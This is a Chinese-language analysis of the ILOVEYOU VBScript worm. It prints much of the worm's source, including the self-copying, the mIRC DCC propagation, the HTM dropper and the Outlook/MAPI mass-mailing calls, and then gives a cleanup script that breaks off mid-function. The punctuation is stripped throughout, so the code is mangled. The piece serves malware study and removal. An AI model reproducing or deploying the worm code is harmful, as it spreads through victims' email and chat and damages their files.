“爱虫(I_Loveyou)”病毒代码解析和杀毒方法 (2)

爱虫 I Loveyou 病毒代码解析和杀毒方法 中国代码联盟 黄冬 李文武 近来在网上出现了 我爱你 病毒 让人们恐慌一时 而它在 国内却没有出现 什么问题 到现在我也没有听到有哪位计算机使用者说自己被爱到 至死 究其原因 是什么 而 我爱你 病毒到底是什么 难道说是我国的计算机防 毒水平和计算 机杀毒软件的水平已经到了世界领先的水平 我们来细细看看它的 原因就明白其中 的道理了 另 笔者写本文完全是为了学术作用 请不要将此病毒 代码用于破坏之 目的 首先让我们来看一看我爱你病毒的来源 有一天你会收到一封 邮件 它的主题 是 I Love You 如果细细读读它的程序 这个主题其实可以并不是 I Love You 在它的信中带有了一个叫 iloveyou vbs 的附件 而这个附 件将是病毒 的根源 下面这段是 我爱你 病毒的所有的源代码 其中加入了 我的注释 大多 数的 vbs 的语法大家可以到 wsh 中去查 我在函数调用的地方写明 了这些函数的说明 具体实现可以到函数体中去找 Rem Rem 本文件为病毒样本 供学习之用 原文件中扫描文件进行感染 部分被我注释掉 了 Rem 请勿将本文件用作破坏之目的 white wwwasp hd hd email Rem On Error Resume Next dim fso dirsystem dirwin dirtemp eq ctr file vbscopy dow eq ctr 0 Set fso CreateObject Scripting FileSystemObject set file fso OpenTextFile WScript ScriptFullname 1 vbscopy file ReadAll main sub main On Error Resume Next dim wscr rr set wscr CreateObject WScript Shell rr wscr RegRead HKEY CURRENT USER Software Microsoft Windows Scripting Host Settings Timeout if rr 1 then wscr RegWrite HKEY CURRENT USER Software Microsoft Windows Scripting Host Settings Timeout 0 REG DWORD end if Set dirwin fso GetSpecialFolder 0 Set dirsystem fso GetSpecialFolder 1 Set dirtemp fso GetSpecialFolder 2 Set c fso GetFile WScript ScriptFullName c Copy dirsystemmIRC Script scriptini WriteLine Please dont edit this script mIRC will corrupt if mIRC will scriptini WriteLine corrupt WINDOWS will affect and will not run correctly thanks scriptini WriteLine scriptini WriteLine Khaled Mardam Bey scriptini WriteLine scriptini WriteLine scriptini WriteLine n0 on 1 JOIN scriptini WriteLine n1 if nick me halt scriptini WriteLine n2 dcc send nick vbcrlf vbcrlf vbcrlf vbcrlf vbcrlf vbcrlf vbcrlf dt1 replace dta1 chr 35 chr 45 chr 35 dt1 replace dt1 chr 64 chr 45 chr 64 dt4 replace dt1 chr 63 chr 45 chr 63 dt5 replace dt4 chr 94 chr 45 chr 94 dt2 replace dta2 chr 35 chr 45 chr 35 dt2 replace dt2 chr 64 chr 45 chr 64 dt3 replace dt2 chr 63 chr 45 chr 63 dt6 replace dt3 chr 94 chr 45 chr 94 set fso CreateObject Scripting FileSystemObject set c fso OpenTextFile WScript ScriptFullName 1 lines Split c ReadAll vbcrlf l1 ubound lines for n 0 to ubound lines lines n replace lines n chr 91 chr 45 chr 91 lines n replace lines n chr 93 chr 45 chr 93 lines n replace lines n chr 37 chr 45 chr 37 if l1 n then lines n chr 34 lines n chr 34 else lines n chr 34 lines n chr 34 vbcrlf end if next set b fso CreateTextFile dirsystem LOVE LETTER FOR YOU HTM b close set d fso OpenTextFile dirsystem LOVE LETTER FOR YOU HTM 2 d write dt5 d write join lines vbcrlf d write vbcrlf d write dt6 d close end sub 看完了病毒的全部代码是不是大家不敢相信这三百行的 VisualBasic 语句就把 一台 活生生 的计算机搞的 人不像人 鬼不像鬼 是呀 由于 现在的脚本语 言的流行 以及 Mircrsoft 推出的 WSH Windows Script Hosting 更 让这些脚本 语言可以在任何一台计算机上兴风作浪 WSH 是一个能让 VisualBasic Script 和 JScript 脚本能在 Windows 环境下如命令行的批处理文件 bat 文件 一样运行的一 个服务 它可以让 Script 去创建一个 Windows 里的 COM OLE 对象 并去使用这些对 象里的方法 属性和事件 在上述程序中有这样一段 set regedit CreateObject WScript Shell set out WScript CreateObject Outlook Application set mapi out GetNameSpace MAPI for ctrlists 1 to mapi AddressLists Count set a mapi AddressLists ctrlists 它就是调用了 WScript Shell 这个 COM 组件来操作注册表 调用 Outlook Application 对像来操作 Outlook 由于 Outlook Express 在最近的几个 版本中已经 越来越像 Outlook 了 所以对一些版本它也会影响到 Outlook Express 调用了 MAPI 组件来得到地址和发送邮件 在 Outlook Express 4 0 之后也提 供了 MAPI 组件 所以无论你是安装了 Outlook 或是 Outlook Express 都会被调用来 发出大量的邮件 如果你是一名熟悉哪简单的 VBA Visual Basic Application 用于 Word 的宏脚本 哪么这段小程序就一眼看懂了 所以 这么想想 这爱大家的病 毒原来也与 Word Office 宏病毒差不多哟 所以这么一说 这爱大家的病毒需要有一个好的环境才能生存 的 要是 Windows 95 SR2 以上的操作系统 Windows NT4 安装了 Option Pack4 要使用 Outlook 或是高版本的 Outlook Express 来收信 要能收到这个带有病毒的 Mail 这也就是国内为什么这个病毒没有大量发作的原因了 首先国 内的 Mail 几大量 使用了 Web Mail 而这样的 Mail 系统没有到达客户的计算机上所以 也就不可能发作 了 再就是国内使用了众多的非 Outlook Outlook Express 高版本这 样的 Mail Client 所以受害者也少 好了 哪么了解其原理 笔者给大家一个练习的机会 我们 以毒攻毒 用 同样的技术来写一段程序 大家可以用这样的程序来攻击 我爱你 rem I love You virus 清除程序 On Error Resume Next dim fso dirsystem dirwin dirtemp eq ctr file vbscopy dow dim logfile eq ctr 0 Set fso CreateObject Scripting FileSystemObject Set logfile fso OpenTextFile clean up log 8 True logfile WriteLine now main sub main On Error Resume Next dim wscr rr set wscr CreateObject WScript Shell Wscript echo Wscript echo Running clean up script There will be several messages along the way Wscript echo You will get a Clean up done message when it is finished Wscript echo rr wscr RegRead HKEY CURRENT USER Software Microsoft Windows Scripting Host Settings Timeout if rr 1 then wscr RegWrite HKEY CURRENT USER Software Microsoft Windows Scripting Host Settings Timeout 0 REG DWORD end if Set dirwin fso GetSpecialFolder 0 Set dirsystem fso GetSpecialFolder 1 Set dirtemp fso GetSpecialFolder 2 Wscript echo delete files that might have been created logfile WriteLine delete files that might have been created Set c fso GetFile dirsystem MSKernel32 vbs c Delete True Set c GetFile dirwin Win32DLL vbs c Delete True Set c GetFile dirsystem LOVE LETTER FOR YOU TXT vbs c Delete True Wscript echo clean up run at boot and IE start page registry entries logfile WriteLine clean up run at boot and IE start page registry entries regruns Wscript echo delete html file s that might have been created logfile WriteLine delete html file s that might have been created html Wscript echo clean up e mail related registry entries logfile WriteLine clean up e mail related registry entries spreadtoemail Wscript echo rescan same drive and folder list as original virus to detect infected files logfile WriteLine rescan same drive and folder list as original virus to detect infected files listadriv Wscript echo Clean up done logfile WriteLine Clean up done end sub sub regruns On Error Resume Next Dim num downread regdelete HKEY LOCAL MACHINE Software Microsoft Windows CurrentVersion Run MSKern el32 regdelete HKEY LOCAL MACHINE Software Microsoft Windows CurrentVersion RunService s Win32DLL downread regget HKEY CURRENT USER Software Microsoft Internet Explorer Download Directory regwrite HKCU Software Microsoft Internet Explorer Main Start Page http intraweb regdelete HKEY LOCAL MACHINE Software Microsoft Windows CurrentVersion Run WIN BU GSFIX end sub sub listadriv On Error Resume Next Dim d dc s Set dc fso Drives For Each d in dc If d DriveType 2 or d DriveType 3 Then Wscript echo scanning drive d path logfile WriteLine scanning drive d path folderlist d path end if Next listadriv s end sub sub infectfiles folderspec On Error Resume Next dim f f1 fc ext ap mircfname s bname mp3 dim line ret set f fso GetFolder folderspec set fc f Files for each f1 in fc ext fso GetExtensionName f1 path ext lcase ext s lcase f1 name if ext vbs or ext vbe then set ap fso OpenTextFile f1 path 1 line ap ReadLine ap close If Left line 27 rem barok loveletter vbe Then set cop fso GetFile f1 path cop Copy f1 path infected cop Delete true Wscript echo moved f1 path to f1 path infected logfile WriteLine moved f1 path to f1 path infected End If elseif ext js or ext jse or ext css or ext wsh or ext sct or ext hta then set ap fso OpenTextFile f1 path 1 line ap ReadLine ap close If Left line 27 rem barok loveletter vbe Then set cop fso GetFile f1 path cop Copy f1 path infected cop Delete True Wscript echo moved f1 path to f1 path infected logfile WriteLine moved f1 path to f1 path infected End If elseif ext jpg or ext jpeg then set ap fso OpenTextFile f1 path 1 line ap ReadLine ap close If Left line 27 rem barok loveletter vbe Then set cop fso GetFile f1 path cop Copy f1 path infected cop Delete True Wscript echo moved f1 path to f1 path infected End If elseif ext mp3 or ext mp2 then set ap fso OpenTextFile f1 path 1 line ap ReadLine If Left line 27 rem barok loveletter vbe Then set cop fso GetFile f1 path cop Copy f1 path infected cop Delete Wscript echo moved f1 path to f1 path infected End If ap close end if if eqfolderspec then if s mirc32 exe or s mlink32 exe or s mirc ini or s script ini or s mirc hlp then set ap fso OpenTextFile folderspec script ini line ap ReadLine If Left line 27 rem barok loveletter vbe Then set cop fso GetFile f1 path cop Copy f1 path infected cop Delete Wscript echo moved folderspec script ini to folderspec script ini infected End If ap close eq folderspec end if end if next end sub sub folderlist folderspec On Error Resume Next dim f f1 sf tf If Len folderspec 55 Then tf Right folderspec 55 Else tf folderspec End If Wscript echo scanning folder tf logfile WriteLine scanning folder tf set f fso GetFolder folderspec set sf f SubFolders for each f1 in sf infectfiles f1 path folderlist f1 path next end sub sub regdelete regkey Set regedit CreateObject WScript Shell regedit RegDelete regkey end sub sub regwrite regkey regvalue Set regedit CreateObject WScript Shell regedit RegWrite regkey regvalue end sub function regget value Set regedit CreateObject WScript Shell regget regedit RegRead value end function function fileexist filespec On Error Resume Next dim msg if fso FileExists filespec Then msg 0 else msg 1 end if fileexist msg end function function folderexist folderspec On Error Resume Next dim msg if fso GetFolderExists folderspec then msg 0 else msg 1 end if fileexist msg end function sub spreadtoemail On Error Resume